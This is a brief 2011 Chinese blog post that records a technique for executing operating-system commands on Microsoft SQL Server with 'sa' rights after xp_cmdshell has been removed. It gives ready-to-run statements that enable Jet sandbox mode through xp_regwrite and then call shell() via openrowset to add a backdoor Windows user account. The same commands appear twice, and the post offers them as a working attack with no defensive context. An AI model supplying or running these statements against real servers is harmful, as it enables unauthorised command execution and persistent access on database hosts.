SA 沙盤(pán)模式下不用恢復(fù)xp_cmdshell和xplog70.dll也執(zhí)行命令
更新時(shí)間:2011年01月04日 23:53:03 作者:
sa下刪除xp_cmdshell和xplog70.dll時(shí)候的一種辦法,不算新的了,
也被一些人不斷的再次提出來(lái),為了方便自己記憶再寫(xiě)出來(lái),
在這種情況下,要執(zhí)行命令,條件是要有xp_regwrite。
首先開(kāi)啟沙盤(pán)模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執(zhí)行系統(tǒng)命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執(zhí)行系統(tǒng)命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
您可能感興趣的文章:
相關(guān)文章
Mac下使用mitmproxy抓包HTTPS數(shù)據(jù)方法詳解
在Mac上常用的抓包軟件是 Charles下面為大家介紹另一個(gè)抓包神器 mitmproxy,具體使用方法大家可以參考下面的介紹2020-02-02分析攻擊IP來(lái)源地與防御IP攻擊的應(yīng)對(duì)策略
今天小編就為大家分享一篇關(guān)于分析攻擊IP來(lái)源地并畫(huà)出餅圖的文章,小編覺(jué)得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來(lái)看看吧2018-09-09CTF AWD入門(mén)學(xué)習(xí)手冊(cè)
這篇文章主要為大家介紹了CTF AWD入門(mén)學(xué)習(xí)手冊(cè),有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2022-10-10